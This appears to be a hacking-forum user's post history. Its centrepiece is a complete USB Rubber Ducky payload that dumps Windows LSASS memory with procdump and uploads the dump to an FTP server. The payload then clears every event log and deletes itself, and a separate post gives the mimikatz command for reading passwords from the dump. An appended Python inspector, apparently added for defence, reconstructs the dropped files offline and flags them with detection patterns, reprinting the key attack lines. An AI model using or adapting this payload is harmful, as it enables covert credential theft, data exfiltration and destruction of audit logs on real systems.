
waddell

Active Members
Posts: 4

Everything posted by waddell

  1. Will this be ported over to Firmware v3.X? Also is there anywhere I can manually download this on my pc (just to inspect the code)?
  2. I'm not able to get this command to export my profile. I've tried this on two different computers but I get a response like "The filename, directory name, or volume label syntax is incorrect." for a command like "netsh wlan export profile key=clear". Anyone else having issues with this? I am logged in as an admin, and I've also tried to run cmd as administrator.
  3. I wrote the same thing, but it instead uploads to an FTP server quietly in the background. You may want to make a rule for Windows Firewall with netsh first. Not sure if this would set off AV or not, but you only have to plug the Ducky in long enough to write the files and start the process. After uploading it literally deletes itself. https://forums.hak5.org/index.php?/topic/30160-payload-ftp-lsass-grab/

     Are you only interested in doing this through external storage? If not, you may consider using your exfiltration to back up the dump file remotely once it's created. Also, you can send commands to mimikatz; it might look like this (change the dmp file name if needed):

     mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full"
  4. I'm sure this can be more discreet, and possibly faster, but this was the simplest way to get what I wanted done. Once you have the dmp file, just use mimikatz to find the passwords.

     Note: Some of this needs to be edited for your FTP server's information (pay attention). You may need to modify this for UAC.

     Thanks to:
     https://forums.hak5.org/index.php?/topic/29800-payload-duck-slurp-payload/
     https://forums.hak5.org/index.php?/topic/30103-payload-exfiltration-via-wifi/
     http://www.room362.com/blog/2013/6/7/using-mimikatz-alpha-or-getting-clear-text-passwords-with-a.html

     REM Payload: FTP LSASS dump for password stealing
     REM Target: Windows 7
     REM Author: Matt Waddell
     REM Some information taken from other payloads on forums, but this is a nice working utility for dumping passwords to ftp server
     REM Copies files to target machine and executes it hidden in background so you are very quick with the attack
     REM There is probably many better ways to do what I am doing, but as a sys admin this is what I needed to prove a point
     DEFAULT_DELAY 75
     DELAY 3000
     GUI R
     DELAY 1000
     STRING cmd /Q /D /F:OFF /V:ON /K
     DELAY 500
     ENTER
     REM *** Some Quick Clean Up (Just In Case) ***
     REM Will remove any existing files to make scripts work quicker and better
     STRING if not exist C:\Temp md C:\Temp
     ENTER
     STRING erase /Q C:\Temp\procdump.exe
     ENTER
     STRING erase /Q C:\Temp\*.dmp
     ENTER
     STRING erase /Q C:\Temp\*.txt
     ENTER
     STRING erase /Q C:\Temp\*.bat
     ENTER
     STRING erase /Q C:\Temp\*.ftp
     ENTER
     STRING erase /Q C:\Temp\*.vbs
     ENTER
     STRING CD C:\Temp
     ENTER
     REM *** ftp_down.ftp ***
     REM Your download settings for grabbing procdump off your ftp server (minimizes need for local storage device) (modify as needed)
     STRING copy con ftp_down.ftp
     ENTER
     STRING USER ***********
     ENTER
     STRING *******PASS*********
     ENTER
     STRING get procdump.exe C:\Temp\procdump.exe
     ENTER
     STRING bye
     ENTER
     CONTROL Z
     ENTER
     REM *** ftp_up.ftp ***
     REM Your upload settings for putting the lsass dump and some system information settings on your ftp server (modify as needed)
     REM mput rather than put: ftp.exe's put does not expand wildcards; the -i on the upload call below suppresses the per-file prompt
     STRING copy con ftp_up.ftp
     ENTER
     STRING USER ***********
     ENTER
     STRING *******PASS*********
     ENTER
     STRING mput C:\Temp\*.dmp
     ENTER
     STRING mput C:\Temp\*.txt
     ENTER
     STRING bye
     ENTER
     CONTROL Z
     ENTER
     REM *** ftp_lsass.bat ***
     REM Runs in background, downloads procdump, dumps passwords, uploads dump and system info, deletes all files, clears logs
     STRING copy con ftp_lsass.bat
     ENTER
     STRING ftp -n -s:C:\Temp\ftp_down.ftp **********server*************
     ENTER
     STRING procdump.exe -accepteula -ma lsass.exe C:\Temp\%COMPUTERNAME%_lsass.dmp
     ENTER
     STRING systeminfo > C:\Temp\%COMPUTERNAME%_system.txt
     ENTER
     STRING ftp -n -i -s:C:\Temp\ftp_up.ftp **********server*************
     ENTER
     STRING erase /Q C:\Temp\procdump.exe
     ENTER
     STRING erase /Q C:\Temp\*.dmp
     ENTER
     STRING erase /Q C:\Temp\*.txt
     ENTER
     STRING erase /Q C:\Temp\*.ftp
     ENTER
     STRING erase /Q C:\Temp\*.vbs
     ENTER
     REM %%x rather than %x: the FOR variable is being written into a .bat file, where a single % is consumed by the batch parser
     STRING for /f %%x in ('wevtutil el') do wevtutil cl "%%x"
     ENTER
     STRING del %0
     ENTER
     STRING exit
     ENTER
     CONTROL Z
     ENTER
     REM *** VBS File for Running Invisibly ***
     STRING copy con C:\Temp\invis.vbs
     ENTER
     STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
     ENTER
     CONTROL Z
     ENTER
     REM *** Run Primary Payload and Close Rubber Ducky Cmd Window (can remove ducky when it is closed, everything else is in background) ***
     STRING wscript.exe C:\Temp\invis.vbs C:\Temp\ftp_lsass.bat && exit
     ENTER
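Added example, not code from the post or from Hak5: a small Python inspector that replays a DuckyScript payload's keystrokes offline and reconstructs the files the `copy con` idiom writes, so the dropped batch, ftp script and VBS launcher can be read before anything is plugged in. The embedded DuckyScript is a constructed excerpt of the payload above (the server placeholder is the post's own redaction); the indicator names and regexes are assumptions chosen for this example, not any tool's signature set.

```python
"""Reconstruct what a DuckyScript payload drops on disk, without running it (added example)."""
import re

CTRL_Z = "\x1a"
# Constructed excerpt of the payload above; the server placeholder is the post's own redaction.
SAMPLE_DUCKY = r'''
GUI R
STRING cmd /Q /D /F:OFF /V:ON /K
ENTER
STRING CD C:\Temp
ENTER
STRING copy con ftp_up.ftp
ENTER
STRING mput C:\Temp\*.dmp
ENTER
CONTROL Z
ENTER
STRING copy con ftp_lsass.bat
ENTER
STRING procdump.exe -accepteula -ma lsass.exe C:\Temp\%COMPUTERNAME%_lsass.dmp
ENTER
STRING ftp -n -i -s:C:\Temp\ftp_up.ftp **********server*************
ENTER
STRING for /f %%x in ('wevtutil el') do wevtutil cl "%%x"
ENTER
STRING del %0
ENTER
CONTROL Z
ENTER
STRING copy con C:\Temp\invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER
STRING wscript.exe C:\Temp\invis.vbs C:\Temp\ftp_lsass.bat && exit
ENTER
'''


def keystroke_lines(script):
    """Replay STRING / ENTER / CONTROL Z as a typist would: ENTER submits the buffered text."""
    lines, buf = [], ""
    for line in map(str.strip, script.splitlines()):
        if not line or line.startswith("REM"):
            continue
        cmd, _, arg = line.partition(" ")
        if cmd == "STRING":
            buf += arg
        elif cmd == "ENTER":
            lines.append(buf)
            buf = ""
        elif cmd == "CONTROL" and arg.upper() == "Z":
            buf += CTRL_Z
        elif cmd not in ("DELAY", "DEFAULT_DELAY", "GUI"):  # timing and Win+R type no text
            raise ValueError(f"unsupported DuckyScript command: {line}")
    return lines


def emulate_console(lines, cwd="C:\\"):
    """Model the two cmd.exe behaviours the payload relies on: copy con (buffer until Ctrl+Z) and cd.
    Returns (files, commands): path -> text written by copy con, and everything else typed."""
    files, commands, capture = {}, [], None
    for line in lines:
        if capture is not None:
            body, ctrl, _ = line.partition(CTRL_Z)
            if body:
                capture[1].append(body)
            if ctrl:
                files[capture[0]] = "\r\n".join(capture[1]) + "\r\n"
                capture = None
        elif m := re.match(r"copy\s+con\s+(\S+)", line, re.I):
            path = m.group(1)
            if not re.match(r"[A-Za-z]:\\", path):  # relative name resolves against cwd
                path = cwd.rstrip("\\") + "\\" + path
            capture = (path, [])
        else:
            if m := re.match(r"cd\s+(\S+)", line, re.I):
                cwd = m.group(1)
            commands.append(line)
    return files, commands


INDICATORS = {  # assumed patterns a defender would flag in the reconstructed files and commands
    "lsass memory dump": r"procdump.*lsass|sekurlsa::minidump",
    "event log wipe": r"wevtutil\s+cl",
    "ftp exfiltration": r"^ftp\s+.*-s:",
    "hidden window launch": r"\.Run\b.*,\s*0\s*,",
    "self-deletion": r"del\s+%0",
}


def inspect_payload(script):
    """Return (files, commands, hits); hits maps an indicator name to the lines that matched it."""
    files, commands = emulate_console(keystroke_lines(script))
    corpus = commands + [ln for body in files.values() for ln in body.splitlines()]
    hits = {n: [ln for ln in corpus if re.search(p, ln, re.I)] for n, p in INDICATORS.items()}
    return files, commands, {n: v for n, v in hits.items() if v}


if __name__ == "__main__":
    files, commands, hits = inspect_payload(SAMPLE_DUCKY)
    for path, body in files.items():
        print(f"--- {path} ---\n{body}")
    print(*(f"[!] {n}: {v[0]}" for n, v in hits.items()), sep="\n")
```

Running it prints the three reconstructed files (C:\Temp\ftp_up.ftp, C:\Temp\ftp_lsass.bat, C:\Temp\invis.vbs) and one matching line per indicator. Reading the dropped batch this way is also where the two quirks of the `copy con` approach become visible: `%%x` has to survive into the .bat as a FOR variable, and ftp.exe needs `mput` plus `-i` for a wildcard upload.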